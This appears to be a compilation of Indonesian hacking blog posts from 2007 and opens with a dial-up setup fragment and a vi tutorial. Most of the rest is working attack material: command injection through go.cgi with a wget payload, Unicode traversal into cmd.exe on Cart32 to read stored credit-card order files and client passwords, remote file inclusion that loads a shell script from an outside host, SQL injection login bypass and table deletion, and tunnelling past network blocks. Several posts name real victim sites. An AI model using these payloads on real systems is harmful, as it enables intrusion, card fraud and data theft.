Checking LILO

Executing some Sysv init scripts

Executing: /etc/rc.d/rc5.d/S10network reload

Setting firewalling

6.Lihat isi konfigurasi ipchains anda dengan menggunakan perintah berikut :

# ipchains -L -n

Chain input (policy ACCEPT):

Chain forward (policy DENY):

target prot opt source destination ports

MASQ all ----l- 192.168.0.0/24 0.0.0.0/24 n/a

MASQ all ----l- 127.0.0.0/24 0.0.0.0/24 n/a

Chain output (policy ACCEPT):

Maka coba konfigurasikan Dial-Up anda dengan menggunakan Gnome X Window.

1.Klik Gnome Star

2.Klik Internet + Dial Up Config Configuration Tool

- Pilih Add

- Selanjutnya menu Desktop Create a new Internet Connection maka Pilih NEXT

- Menu Phone number and name

- Account name : telkom

- Prefix : kosongkan

- Area/Country code : kosongkan

- Phone Number : 080989999

3.Pilih NEXT

4.Pada Menu Desktop User name and password isi sesuai dengan :

- User name : telkomnet@instan

- password : telkom

5.Pilih NEXT

6.Menu Other option Pilih Normal ISP + Next

7.Pada menu Create the account Pilih Finish

Konfigurasi Modem :

1.Pada menu Internet Connection Pilih Modem + Add

2.Menu Desktop Edit Modem Properties :

- Modem Device : /dev/ttys1 (com2) /dev/ttys0 (com1)

- tandai pada Auto configuration

- Pilih OK

Untuk selanjutnya maka koneksi ke ISP dapat dilakukan dengan melakukan perintah :

-> Gnome Star + Internet + RH PPP Dialer

bila ada pilihan choice (pilih) maka pilih Telkom, maka modem akan mendial nomer 080989999 tunggu sesaat hingga muncul koneksi desktop atau menu koneksi akan secara otomatis hilang dari desktop.

Untuk memastikan koneksi maka jalan perintah :

# route -n

Destination Gateway Genmask Flags Metric Ref Use Iface

192.168.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 eth0

192.168.0.0 192.168.0.1 255.255.255.0 UG 0 0 0 eth0

192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

127.0.0.0 0.0.0.0 255.0.0.0 U 0 0 0 lo

0.0.0.0 192.168.0.254 0.0.0.0 UG 1 0 0 eth0

# ping www.telkom.net

apabila semua terkoneksi maka biarkan perintah ping berjalan dengan

sendirinya, dan perintah ping juga menjadi ukuran seberapa cepat koneksi

data dari komputer / server anda ke Internet Service Provider (ISP).

Menggunakan vi sebagai Editor

2007-10-26T04:35:00.000-07:00

###############################################

Menggunakan vi sebagai Editor _ _

akhir Maret 2003 (o o)

============================ ooO--(_)--Ooo-===

[ powered By oh_gayo ]

Selamat dengan port anda sekarang anda telah membuka dan membaca tutorial ini!

Tutorial ini adalah tutorial dasar untuk pemula yang binggung gimana caranya menggunakan

editor khususnya editor vi di linux dan di unix tentunya.

1. Pendahuluan

Editor Vi memiliki banyak fasilitas yang sangat membantu para programer, namun para pemakai pemula menghindari vi karena mereka menganggap editor ini sangat sulit dan membingungkan. tulisan ini akan mengajarkan anda giman cara menggunakan vi

Editor Vi (baca : vi ai ) adalah layar yang digunakan oleh banyak pemakai Unix.

sama hal nya program Edit pada MS-dos.

Macam-macam editor di linux

1.vi

2.pico

3.joe

4.emacs

5.dll

2. Lansung saja

a. Cara memulai dan mengakhiri Vi

gayo@Vanadium:~$ vi [nama_file] --> untuk memulai yang diedit/baru

gayo@Vanadium:~$ untuk mengakhiri Vi tekan [ Esc ] lalu ketik : q

b. ^

atas

ka>

bawah

* Tombol ka ada dikanan,untuk bergerak kekanan.

* Tombol ki ada dikiri,untuk bergerak kekiri.

* Tombol a ada diatas dan untuk bergerak atas

* Tombol b ada dibawah dan untuk bergerak bawah

ada beberapa perintah untuk mengerakan cursor :

^ artinya : tekan tombol ctrl

g : untuk berpindah ke baris tertentu

^F : berpindah satu layar penuh ke bawah

^B : berpindah satu layar penuh ke atas

^D : berpindah satu setengah layar penuh ke bawah

^U : berpindah satu setengah layar penuh ke atas

^w : berpindah satu kata kedepan

^b : berpindah satu kata kebelakang

c. Mengedit Teks

tekan Esq tekan

* i (insert) : memasukan teks baru

* a : menambah teks setelah kursor saat ini

* o : membuka newline setelah baris saat ini

* O : membuka newline sebelum baris saat ini dan menambah teks

* x atau delete: menghapus satu character

* dd : menghapus satu baris

* u : undo membatalkan perintah

* p : menaruh teks

* w : menyimpan teks

* wq : menyimpan lalu keluar

* e : membuka berkas

* /[textnya] : untuk pencarian kata KEATAS

* ?[textnya] : untuk pencarian kata KEBAWAH

* w namafile : bila belom ada nama filenya

yang sering dipakai oleh lamerz.. yaitu melalukan copy paste baik itu program maupun exploit source ...

Caranya :

Copy :

tekan tombol ESC

Navigasi ke baris dimana teks yang ingin dicopy berada. Jika Anda hanya ingin mengopy 1 baris, maka tekanlah tombol y dua kali.

Jika banyak tekanlah shift+v untuk memblok kemudian tekanlah tombol y sekali kali(buat paste).

Paste Navigasi ke lokasi dimana teks yang berada di memory ingin Anda letakkan.

Tekan tombol ESC

tekan tombol p

Cut

Sama seperti copy, tetapi gantilah tombol y dengan tombol d.

Pengen editornya berwarna warni seindah pelangi... ok sebelom kita dapat mengenal itu file bertype apa misalkan bahasa terkenal seperti c, python,php,cgi, dll coba tebak pake apa ? :p (bila anda mencari tahu berarti anda sudah menyukai editor vi)

Perintah-perintah yang barusan ditulis.. adalah perintah-perintah dasar yang sering kita pakai sebenarnya masih banyak lagi perintah-perintah untuk memanipulasi text dalam suatu file.!

thank's for my friend's on dalnet: #samaridahack,#renjana

Cgibin

2007-10-21T06:40:00.000-07:00

Author : Watchers

cgi-bin/go.cgi?go=|[command]|

Lagi lagi bug baru dari /cgi-bin/. Target memang rada rada sedikit, apakah karena belum dipublikasikan atau memang para webmaster tdk suka menggunakan cgi-bin.go.cgi belum jelas. namun dari pencarian yang penulis lakukan, masih sedikit yang menggunakan tools tersebut.

lebih lanjut...

bug ini sama seperti yang bug lain, yaitu kita tetap bekerja di web browser.

Berikut ini syntax penulisannya yaitu :

http://www.domainname.com/cgi-bin/go.cgi?go=|command|

Dibagian command kita bisa memberikan perintah perintah linux. Karena memang target ini adalah linux.

Beberapa contoh perintah yang bisa kita terapkan antara lain :

1. wget

http://www.domainname.com/cgi-bin/go.cgi?go=|wget www.jelaga-online.org/index.html -O /tmp/test.html|

2. id, ls -al, whoami, http://www.domainname.com/cgi-bin/go.cgi?go=|id|

dan yang lain lainnya tergantung dari improvisasi anda.

Dari beberapa yang penulis coba, ternyata mendapatkan OS REDHAT, DEBIAN dan FreeBSD. Mungkin bagi teman teman yang lain bisa menemukan improvisasi yang lain.

Beberapa target yang berhasil penulis test antara lain :

1. www.canada-immigrating.com

2. www.messiahpage.com

3. www.lpwi.org

Mungkin sekian dulu, dan #renjana sangat menngharapkan masukan masukan dari yang lain, agar share ilmunya tetap terjalin.

Thanks :

Phaty atas sample nya

Cupid^ yang telah memberikan bug nya 3 hari yang lalu

Teman teman semuanya dalam renjanaCREW.

Keep on Learn everything

Cart32 v3.5a Exploit

2007-10-21T06:31:00.000-07:00

Judul : Cart32 v3.5a Exploit

Oleh : r3v0lt

Peringatan :

Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk melindungi diri kamu sendiri.

Tutorial ini ditulis berdasarkan pengalaman gua selama menjelajahi dunia maya. Dikumpulkan dari berbagai tutorial dan hasil ngobrol di #. Dan tulisan ini di peruntukkan untuk para newbies. Buat yang udah para CARDER tulen, kalo nich tutorial banyak kesalahan gua minta di kritik OK!

TUTORIAL I : Cart32 v3.5a

----------------------------------------

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a

Langkah 2: Masuk ke website Cart32.exe

http://target/login/unicode/cart32.exe

(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)

Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane Connections

License: Unlimited clients

Build 714

========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di

akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga sekarang

kamu dapat melihat seperti : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc's seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)

procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti

*c+dir+c:\* ke *c+type+c:\*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Ke http://www.partybows.com

2. Klik http://www.partybows.com/seasonal.htm

3. Isi Quantity= 1

Pokoknya kayak lu pura2x beli dan klik order

4. Maka akan kesini jadinya :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Ubah menjadi

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure Error Number = 5

Click Here For Possible Solutions

etc.

6. Cari log order-nya

Cart32 Setup Info and Directory

Mail Server = mail.axion.net

Section=Main

AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\

Jadi partybows-orders.txt

7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist

and erase the rest

a menu will come up with a submit box

click go

it will list ALL clients

and their passwords

passwords will be encrypted

after decrypting the password, go to wherever the c32web.exe file is

thats the instructions wit exploits

what that channel we were just in called

Bug Html Bug

2007-10-21T06:24:00.000-07:00

bug si htmltonuke.php

asoy juga... bug si htmltonuke.php

sampe pusing aku dibuatnya,, ada yang bisa .. ada pula yang tidak

begitu lah nasib pencari hole... ckckckckck :p

mulai deh :

1. buka paman google

2. ketik dalam kotak pencari itu : /htmltonuke.php? nah banyakkan

kamu lihat dapet seperti ini http://www.sitenya.com/htmltonuke.php?filnavn=membres.html

3.http://www.sitenya.com/htmltonuke.php?filnavn=http://securedbox.net/c4e/x.txt?&cmd=|command|

... gunakan ( http://securedbox.net/c4e/x.txt?&cmd=| | ) ini sesudah htmltonuke.php?filnavn=

contoh site yang mau belom dipatch :

http://www.mailhilfe.de/htmltonuke.php?filnavn=http://securedbox.net/c4e/x.txt?&cmd=id;uname+-a

http://www.sistersublime.org/htmltonuke.php?filnavn=http://securedbox.net/c4e/x.txt?&cmd=id;uname+-a

command biasa seperti : id;uname+-a;

praktekan seperti cpanel dan bug-bug kawannya

by : oh_gayo

Viva #renjana Crot Crews

Bagaimana SQL Injections Menembus Server?

2007-10-20T10:27:00.000-07:00

-----------------------------------------------------

Penulis pernah di tanya oleh seorang Admin server sebuah site trading online di Jakarta, dia agak sedikit heran ketika mengetahui servernya jebol padahal dia hanya membuka port 80 dan sudah terpasang IDS (Intrusion Detection System) seperti Snort dan Snare di servernya dan anehnya ini juga tidak terdeteksi sama sekali oleh logger webserver (biasanya webserver memiliki file log untuk setiap link yang di request client). Karena kebetulan penulis sendiri yang menjebol situs tersebut maka penulis sampaikan bahwa sekuriti server tidak hanya berkaitan dengan masalah konfigurasi server, blocking port dan monitoring/detection intruder saja. Ada permasalahan yang lebih berbahaya dari sekedar setingan hardware yaitu masalah software atau aplikasi yang di gunakan baik di server maupun di halaman web. Aplikasi pengaman apapun (termasuk penggunaan enkripsi dan chipper key) tidak menjamin bahwa server itu akan aman. Di sini memang di tuntut pengetahuan dan informasi akan bugs yang berkembang saat itu.

Setiap menit, jam dan hari semakin banyak bermunculan bugs-bugs terbaru dengan model dan tipe yang berbeda-beda. Kadang hal ini tidak di sadari oleh kita bahwa bugs tersebut ternyata juga ada di server yang kita pakai. Kesibukan dan konsentrasi yang terpecah belah kadang memang membuat kita lengah dan tidak menyadari kemungkinan-kemungkinan jebolnya server yang kita setting. Seperti contoh kasus di atas juga merupakan hal yang tidak di ketahui secara sadar oleh si admin sendiri bahwa ternyata seorang hacker dengan hanya memanfaatkan aplikasi web yang di gunakan dalam sebuah website pun mampu menjebol server tersebut dan merebut akses shell command di dalam server target tanpa mengalami kesulitan. Dan kadang dengan kemampuan yang expert di programming seorang hacker pun mampu menjebol firewall yang terpasang di server target, hal ini telah di buktikan sendiri oleh penulis dengan hanya bermodalkan bugs dan script khusus, penulis bisa mendapatkan hosting-hosting berfirewall bagus baik dari operating sistem Linux, BDS (OpenBSD dan FreeBSD), Debian dan sebagainya.

Kembali ke topik di atas, kebetulan untuk server yang penulis jebol adalah jenis NT server yang memanfaatkan connectivity database seperti ODBC dan SQL yang tidak menggunakan input validation script untuk mengontrol command database yang di masukan (di injeksikan) ke dalam server. Berbicara tentang injection tentu pembaca pernah mendengar juga tentang SQL Injections yang berita-nya sangat ramai di bicarakan di milis dan site-site sekuriti. Bukan basa-basi bugs ini hampir mengenai seluruh server-server berbasiskan NT terutama untuk server NT yang memanfaatkan koneksi ke database untuk web page-nya.

Oke untuk mempermudah pemahaman para pembaca, di sini Penulis akan memberikan contoh kasus sederhana. Dulu jaman pertama kalinya bugs VP-ASP (Software Management untuk pembayaran online), Anda mungkin mengetahui tentang penggunaan karakter single quote (‘) dengan penambahan OR (logical operator) dan tanda sama dengan (=) di antara single quote tersebut.

Password: ‘ OR ‘’=’

Sedikit menganalisa, misal ketika input box untuk login dan password di isi seperti dalam contoh di atas apa yang akan terjadi jika script yang memproses input tersebut seperti di bawah ini.

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";

Untuk beberapa site yang tidak menerapkan sistem validasi input yang secure akan mengakibatkan seorang user bisa masuk baik sebagai admin atau user biasa tanpa membutuhkan login dan password yang sebenarnya. Mengapa? Karena ketika input itu di proses di sistem yang terjadi operasi tersebut di anggap valid.

var sql = "select * from users where username = '’ OR ‘’=’' and password = '’ OR ‘’=’';

Nah tamatlah sudah riwayatmu kini hehe…hehe..

Oke mungkin contoh di atas masih di anggap sangat sederhana, sekarang kalau misalnya saya melakukan action yang lebih ekstrim dari itu?

Username: '; drop table users--

Password:

Apa yang akan terjadi? Saya yakin Anda juga tahu bahwa command tersebut akan menghapus seluruh data di tabel users, coba kita analisa lagi.

var sql = "select * from users where username = '’; drop table users—

Nah apa yang akan Anda perbuat jika yang terjadi adalah seperti command di atas ini? Di sini karakter titik koma (;) menutup command pertama dan kemudian command drop menjadi command berikutnya yang akan di eksekusi oleh sistem dan selanjutnya karakter double minus (--) menutup command-command berikutnya untuk tidak di eksekusi. Yahh klo sudah begini tamatlah sudah data Anda. Paling banter Anda akan di pecat dari perusahaan dan di maki-maki bos Anda karena tidak becus bekerja.

SQL Injections tidak hanya bereaksi di dalam input box saja, dalam sebuah URL pun bisa di aplikasikan. Ini tergantung kemahiran Anda dalam melihat celah dari ketidak-secure-an site tersebut. Tentu di perlukan juga pengetahuan tentang command SQL dan beberapa eksperimen kecil untuk meriching kode di antara variabel-variabel yang ada di site tersebut.

Jadi di mana letak kesalahannya?

Dalam hal ini Microsoft sangat merespon tragedi SQL Injection, bahkan mereka sudah membuat patch-nya. Tapi sekali lagi ini tidak hanya masalah patching saja tapi juga di tuntut kehati-hatian Anda dalam merancang isi web itu sendiri. Solusinya yaa buatlah beberapa fungsi validasi input yang mampu mematikan command-command abnormal yang bisa mempengaruhi atau membuat server bereaksi.

Hanya seperti itu saja? He..hehe… pertanyaan yang sangat menohok tapi nggak papa lah.

Jika Anda mendapatkan bugs ini pada NT server maka beruntunglah Anda karena akses di luar database pun sanggup di lakukan. Seperti apa? Seperti command shell, registry, dan messaging product. Yaa sedikit tentang pengetahuan tentang sistem menjadi mutlak untuk perlu di ketahui agar Anda bisa mendapatkan akses granted administator tentu dengan dukungan kreatifitas dan mungkin jika perlu dukungan kemampuan programming yang Anda kuasai. Coba lihat beberapa command sistem yang bisa Anda manfaatkan untuk mendapatkan akses lebih banyak di server target (NT).

xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread

xp_regremovemultistring, xp_regwrite

xp_availablemedia, xp_dirtree, xp_enumdsn, xp_loginconfig

xp_makecab, xp_ntsec_enumdomains

xp_terminate_process

Anda tertarik? Jika iya, saya sangat menyarankan Anda untuk mencari bahan-bahannya di internet. Tidak ada guru yang lebih baik selain pengalaman dan pengalaman tanpa usaha juga hal yang tidak mungkin. Okeh, Keep the spirits to be the best of the best and remember which nobody perfect, but you should try to be perfect.

Knowledge is Power!

Akal Jaringan

2007-10-20T10:25:00.000-07:00

mengakali jaringan agar bisa ber-IRC ria

Tutorial lama, barangkali boleh dibilang dah lama sekali. But gue yakin tetap berguna, untuk pengembangan ke depan. tutorial ini di kirim oleh Ryan_The

Jurus yang pertama :

Gunakan web proxy jaringan anda sebagai firewall. Pilih proxy pada option dan aktifkan firewall. Isi sesuai web proxinya. Kalau ini tidak berhasil. Gunakan sock 4 atau sock 5 caranya buka www.proxybench.com tuh ada sock4 dan sock5. Sikat langsung. Sama cara penggunaannya.

Syarat jurus pertama :

1.Install MIRC terbaru (6.03 atau lebih baru)

Jika masih belum bisa gunakan ini

Jurus yang kedua :

HTTP-Tunnel akan mengatasinya. Apa sih HTTP-Tunnel itu? HTTP-Tunnel adalah suatu program yang berjalan seperti layaknya suatu SOCKS server di komputer local Anda. HTTP-Tunnel berkomuninasi dengan servernya melalui proxy web di jaringanmu. Nah dari sini jelas bahwa modal utama dari misi kali ini adalah software HTTP-Tunnel Client dan proxy web pada jaringanmu.Pertama yang harus lakukan adalah men-download software HTTP-Tunnel Client dari http://www.http-tunnel.com/ Kemudian kamu harus tahu alamat dari HTTP proxy (web proxy) di jaringan Anda. Misalnya saja alamatnya adalah 192.168.0.1 dengan port 8080. Isikan informasi web proxy tadi pada HTTP-Tunnel Client melalui menu Settings - Configure Firewall. Isikan alamat web proxy pada bagian Server Name/IP dan port web proxy pada bagian Port seperti contoh diatas. Kemudian tekan tombol Test dan apabila sukses maka akan muncul

dialog yang memberi informasi sukses. Sampai disini maka kamu sudah berhasil meng-configure HTTP-Tunnel Client Anda dan HTTP-Tunnel Client akan menjadikan komputermu sebagai SOCKS server (open tcp1080).Cara mapping port komputer server tujuan ke port pada local komputermu. Cara ini lebih baik untuk aplikasi-aplikasi internet yang tidak

menyediakan SOCKS server sebagai metode koneksi ke server mereka. OK, sekarang kita akan mapping server IRC dalnet (irc.dal.net:6667) ke port local komputer. Caranya, pada

HTTP-Tunnel Client pilihlah menu Settings - Add Ports/Applications.kita tambahkan IRC server

irc.telkom.net.id dengan port 6667. Isi bagian Application Port dengan port IRC server tujuan (6667) dan isi bagian Address or IP dengan alamat IRC server (irc.telkom.net.id). Untuk protocolnya pilih saja TCP. Setelah itu tekan tombol Add dan HTTP-Tunnel Client akan

membuat mapping port di local komputermu. Mapping ini maksudnya adalah membuka suatu port tertentu di komputermu seolah-olah menjadi server yang ingin kamu hubungi.

Contohnya adalah seperti pada gambar di atas. Destination IP irc.dal.net yang membuka port 6667 maka akan di mapping ke local port 6667 di komputermu. Ini artinya jika kamu

konek ke localhost:6667 maka akan sama seperti jika kamu konek ke irc.dal.net:6667. Sekarang kita anggap mapping port sudah sukses ke irc.dal.net dan di local komputer

sudah terbuka port 6667 hasil mapping tadi. Mari kita coba implementasinya di mIRC. Silakan buka mIRCmu dan kemudian pada window status ketik perintah berikut:

/server localhost 6667

Perintah ini akan memberitahu mIRC bahwa kita akan mengadakan koneksi ke localhost pada port 6667. Tunggu beberapa saat, jika sukses maka mIRC akan terhubung ke jaringan IRC server dalnet dan siap digunakan untuk chatting.

Jurus yang Ketiga :

Masih belum bisa ???

nah ini adalah jurus pamungkas dimana hasrat untuk chating tinggi. Hehehehehe BNC.

Apaan tuh…? Hehheheheh BNC (BOUNCER) adalah tool yang dipasang di server bisa di linux atau di windows dimana tool ini akan meneruskan request atau response MIRC client ke server IRC. Cara mendapatkannya yang agak sulit. Itu dulu jurus2x untuk bisa ngechat di jaringan yang di blokir. Mo bobo’

2:45 27 april 2003 with like a stone - Audioslave

Terima kasih buat tutor HTTP-TUNNEL dari Sony Arianto

Kurniawan